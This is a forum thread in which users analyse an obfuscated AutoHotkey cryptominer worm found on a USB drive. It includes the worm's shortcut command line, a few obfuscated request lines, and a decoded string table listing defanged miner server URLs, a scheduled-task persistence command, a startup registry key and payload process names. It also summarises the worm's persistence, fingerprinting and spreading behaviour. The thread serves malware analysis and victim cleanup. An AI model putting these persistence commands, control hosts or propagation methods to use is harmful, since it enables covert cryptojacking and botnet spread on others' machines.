I discovered that I was somehow infected with an autohotkey virus - I saw a strange folder in my dropbox and eventually tracked it back to my computer at home, where I found autohotkey running (and set to run at startup).
I think it came via an infected USB drive - there were shortcut links on the disk (in every folder), clicking on one of the links (which was named to be similar to a real file) installed the script + autohotkey. Later it did the same thing to every directory on multiple drives.
I think I have removed all traces, but I am interested to know what it was doing. The person who wrote it clearly did some obfuscating to the source code, so I haven't been able to work it out. Can anyone help me?
Was it connecting to some server? Which one?
Of course, don't run the script yourself! The entire code is below
Thanks,
Jason
Edit: Moderator edit to remove malicious code. A mirror of it can be found by Googling for the hash 5ae1c07477d7dc0d380c3bc3
Help understanding autohotkey virus Topic is solved
Re: Help understanding autohotkey virus
Interesting.... it seems to be an obfuscated script.
Do you know what it did?
Do you know what it did?
Windows 10 x64 Professional, Intel i5-8500, NVIDIA GTX 1060 6GB, 2x16GB Kingston FURY Beast - DDR4 3200 MHz | [About Me] | [About the AHK Foundation] | [Courses on AutoHotkey]
[ASPDM - StdLib Distribution] | [Qonsole - Quake-like console emulator] | [LibCon - Autohotkey Console Library]
Re: Help understanding autohotkey virus
i can already foresee someone hitting that convenient download button and running the script, should prolly do smth about that
Re: Help understanding autohotkey virus
1 - Duplicate post: https://autohotkey.com/boards/viewtopic.php?f=5&t=49727
2 - edit the code to comment it all - add /* at the top of the script
3 - or move the code to pastebin or something - in sections
2 - edit the code to comment it all - add /* at the top of the script
3 - or move the code to pastebin or something - in sections
Re: Help understanding autohotkey virus
I don't know what it did, that is what I am looking for help with.
All I know is that it creating more .lnk files, which had a target:
C:\WINDOWS\system32\cmd.exe "/c start tatdhfzpcxwcbimdnliyx\tatdhfzpcxwcbimdnliyx.exe tatdhfzpcxwcbimdnliyx\tatdhfzpcxwcbimdnliyx.txt tat &exit"
the .exe is just a renamed autohotkey.exe, and the .txt is the file above
I'm assuming that these lines:
f#ffiiifk#.Open(ffkkfii@@ii@("474554"), k@k#kkf@@jj#haku . "/" . f@f@@jj#haku#k#f@f() , true)
f#ffiiifk#.Send()
f#ffiiifk#.WaitForResponse()
are sending something to a website, but no idea to what website or what it is sending
All I know is that it creating more .lnk files, which had a target:
C:\WINDOWS\system32\cmd.exe "/c start tatdhfzpcxwcbimdnliyx\tatdhfzpcxwcbimdnliyx.exe tatdhfzpcxwcbimdnliyx\tatdhfzpcxwcbimdnliyx.txt tat &exit"
the .exe is just a renamed autohotkey.exe, and the .txt is the file above
I'm assuming that these lines:
f#ffiiifk#.Open(ffkkfii@@ii@("474554"), k@k#kkf@@jj#haku . "/" . f@f@@jj#haku#k#f@f() , true)
f#ffiiifk#.Send()
f#ffiiifk#.WaitForResponse()
are sending something to a website, but no idea to what website or what it is sending
-
- Posts: 1472
- Joined: 05 May 2018, 12:23
Re: Help understanding autohotkey virus
run a debugger and monitor it, the same letters appear very often too. Wish I can help you more
Re: Help understanding autohotkey virus Topic is solved
It looks like its using what was called the dynamic obfuscator also in the code it seen the string downloading. eather it downloads the key the decode the script or the key may be contains somewere within the script itself.
whoever owns the dynamic obfuscator might be able to reverse the process but idk.
https://github.com/davidmalia/autohotkey-obfuscator
you could run a wireshark and see what ip address its connecting too also
whoever owns the dynamic obfuscator might be able to reverse the process but idk.
https://github.com/davidmalia/autohotkey-obfuscator
you could run a wireshark and see what ip address its connecting too also
-
- Posts: 1472
- Joined: 05 May 2018, 12:23
Re: Help understanding autohotkey virus
good find! is there a program to reverse what it does?Xatmo97 wrote:It looks like its using what was called the dynamic obfuscator also in the code it seen the string downloading. eather it downloads the key the decode the script or the key may be contains somewere within the script itself.
whoever owns the dynamic obfuscator might be able to reverse the process but idk.
https://github.com/davidmalia/autohotkey-obfuscator
you could run a wireshark and see what ip address its connecting too also
https://github.com/davidmalia/autohotke ... scated.ahk
Re: Help understanding autohotkey virus
Here are all the variables decoded (took only a minute) I disabled the URLs but these are the strings, seems to be a crypto miner... tries to disable some windows security settings as well it seems.
Sad.
Sad.
25434F4D50555445524E414D4525 : %COMPUTERNAME%
25555345524E414D4525 : %USERNAME%
283F503C4E616D653E2E2A3F29 : (?P<Name>.*?)
2D646F776E6C6F6164 : -download
2D736372697074 : -script
2D736C656570 : -sleep
2D757064617465 : -update
2E657865 : .exe
2E65786520433A5C : .exe C:\
2E747874 : .txt
2F312F : /1/
3A213A :
3A3A283F503C4E616D653E2E2A3F293A3A : ::(?P<Name>.*?)::
4142434445464748494A4B4C4D4E4F505152535455565758595A6162636465666768696A6B6C6D6E6F707172737475767778797A30313233343536373839 : ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789
416E7469566972757350726F64756374 : AntiVirusProduct
433A : C:
433A5C : C:\
4552524F52 : ERROR
474554 : GET
484B4355 : HKCU
5245475F535A : REG_SZ
536372697074696E672E46696C6553797374656D4F626A656374 : Scripting.FileSystemObject
53656C656374202A2066726F6D2057696E33325F50726F63657373 : Select * from Win32_Process
536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E5C52756E : Software\Microsoft\Windows\CurrentVersion\Run
556E6B6E6F776E : Unknown
575363726970742E5368656C6C : WScript.Shell
57696E33325F4F7065726174696E6753797374656D : Win32_OperatingSystem
57696E487474702E57696E48747470526571756573742E352E31 : WinHttp.WinHttpRequest.5.1
5C : \
5C2452454359434C452E42494E : \$RECYCLE.BIN
61 : a
6123 : a#
6140 : a@
62 : b
6223 : b#
6240 : b@
63 : c
6323 : c#
6340 : c@
6363 : cc
636D642E657865 : cmd.exe
636F756C646E7420636F6E6E65637420746F20 : couldnt connect to
636F756C646E742066696E6420636F6D6D616E6420696E20 : couldnt find command in
637075636865636B65722E657865 : cpuchecker.exe
637075636865636B657233322E657865 : cpuchecker32.exe
64 : d
6423 : d#
6440 : d@
6464 : dd
646F776E6C6F61642D : download-
646F776E6C6F6164696E672075706461746520 : downloading update
65 : e
6523 : e#
6540 : e@
6565 : ee
66 : f
6623 : f#
6640 : f@
6666 : ff
67 : g
6723 : g#
6740 : g@
67657420636F6D6D616E64 : get command
6767 : gg
68 : h
6823 : h#
6840 : h@
6868 : hh
687474703A2F2F6E6577616C7068612E616C7068616E6F6F622E636F6D3A39383938 : http:// newalpha.alphanoob.c*m:9898
687474703A2F2F6E6577616C7068612E616C7068616E6F6F622E636F6D3A39393939 : http:// newalpha.alphanoob.c*m:9999
687474703A2F2F6E6577616C7068612E73757065722D67616D657A65722E636F6D3A39333333 : http:// newalpha. super-gamezer.c*m:9333
687474703A2F2F6E6F6F626D696E65722E7075626C6963766D2E636F6D3A39383938 : http:// noobminer .publicvm. c*m:9898
687474703A2F2F7375706572616C7068612E6E65776D696E6572736167652E636F6D3A33333333 : http:// superalpha. newminersage.c*m:3333
687474703A2F2F7375706572616C7068612E7261646E65776167652E636F6D3A39383938 : http:// superalpha. radnewage. c*m:9898
69 : i
6923 : i#
6940 : i@
6969 : ii
6A : j
6A23 : j#
6A40 : j@
6A6A : jj
6B : k
6B23 : k#
6B40 : k@
6B6B : kk
6C : l
6C23 : l#
6C40 : l@
6C697665776F726B65722E657865 : liveworker.exe
6C6C : ll
6D : m
6D23 : m#
6D40 : m@
6D6D : mm
6E : n
6E23 : n#
6E40 : n@
6E6E : nn
6E6F76612E657865 : nova.exe
6F : o
6F23 : o#
6F40 : o@
6F6F : oo
70 : p
7023 : p#
7040 : p@
7070 : pp
71 : q
7123 : q#
7140 : q@
7171 : qq
72 : r
7223 : r#
7240 : r@
726164 : rad
7272 : rr
73 : s
7323 : s#
7340 : s@
7363687461736B73202F637265617465202F7363206D696E757465202F6D6F2031202F746E : schtasks /create /sc minute /mo 1 /tn
7363687461736B732E657865 : schtasks.exe
7363726970742D : script-
736C6565702D : sleep-
736C656570696E6720 : sleeping
737065656475702E657865 : speedup.exe
7373 : ss
73747265616D65722E657865 : streamer.exe
7375706572636865636B65722E657865 : superchecker.exe
73797374656D666978 : systemfix
74 : t
7423 : t#
7440 : t@
7474 : tt
75 : u
7523 : u#
7540 : u@
7570646174652D : update-
75706461746573656C662D : updateself-
7575 : uu
76 : v
7623 : v#
7640 : v@
7676 : vv
77 : w
7723 : w#
7740 : w@
77696E6D676D74733A : winmgmts:
77696E6D676D74733A5C5C : winmgmts:\\
77696E6D676D74733A5C5C6C6F63616C686F73745C726F6F745C736563757269747963656E74657232 : winmgmts:\\localhost\root\securitycenter2
7777 : ww
78 : x
7823 : x#
7840 : x@
7878 : xx
787878 : xxx
79 : y
7923 : y#
7940 : y@
7979 : yy
7A : z
7A23 : z#
7A40 : z@
7A7A : zz
Re: Help understanding autohotkey virus
To moderators: if you approve the decoded strings post "above" - you can delete the script code from the forum, no need to help other bad people by keeping the code on the forum.
Re: Help understanding autohotkey virus
I wrote a script to deobfuscate the malware, though I won't share it here.
It's a neat piece of software though the code is pretty sloppy. It's definitely designed for a bitcoin mining botnet. However, it could be updated to do something else in the future.
Some of the things it does:
Edited to add: These are probably the processes you should be looking out for; they seem to be the actual payload of the script.
It's a neat piece of software though the code is pretty sloppy. It's definitely designed for a bitcoin mining botnet. However, it could be updated to do something else in the future.
Some of the things it does:
- Registers a scheduled task to re-launch the script every minute
- Installs a registry key to launch the script on startup
- Fingerprints the machine using the boot drive's serial code, the operating system version number A_OSVersion, and the OS version string (e.g. "Windows 7 Home Premium")
- Collects usage analytics, reporting things such as OS version, AntiVirus version, and whether the payload(s) were able to be run successfully
- It has automatic updates
- It scans the system for external drives to propagate to, like a worm
- To some extent, it randomizes the script obfuscation on start
Edited to add: These are probably the processes you should be looking out for; they seem to be the actual payload of the script.
Re: Help understanding autohotkey virus
Ive already reported those urls the the host of them so that they may take them down.
-
- Posts: 1472
- Joined: 05 May 2018, 12:23
Re: Help understanding autohotkey virus
will you share it on your github?GeekDude wrote:I wrote a script to deobfuscate the malware, though I won't share it here.
It's a neat piece of software though the code is pretty sloppy. It's definitely designed for a bitcoin mining botnet. However, it could be updated to do something else in the future.
Some of the things it does:
As for what domains it connects to, those are here:
- Registers a scheduled task to re-launch the script every minute
- Installs a registry key to launch the script on startup
- Fingerprints the machine using the boot drive's serial code, the operating system version number A_OSVersion, and the OS version string (e.g. "Windows 7 Home Premium")
- Collects usage analytics, reporting things such as OS version, AntiVirus version, and whether the payload(s) were able to be run successfully
- It has automatic updates
- It scans the system for external drives to propagate to, like a worm
- To some extent, it randomizes the script obfuscation on start
Edited to add: These are probably the processes you should be looking out for; they seem to be the actual payload of the script.
Re: Help understanding autohotkey virus
Thanks for all your help with the decoding, I appreciate it.
I don't see any of those processes running (nor autohotkey by itself) so hopefully, it is gone!
I don't see any of those processes running (nor autohotkey by itself) so hopefully, it is gone!
Re: Help understanding autohotkey virus
If anyone wants a copy of the script I wrote to help decode the malware, send me a private message or contact me on IRC/Discord (see the link in my signature). It's pretty specific to that exact script, and wouldn't be of too much use for decoding other scripts.
Who is online
Users browsing this forum: No registered users and 189 guests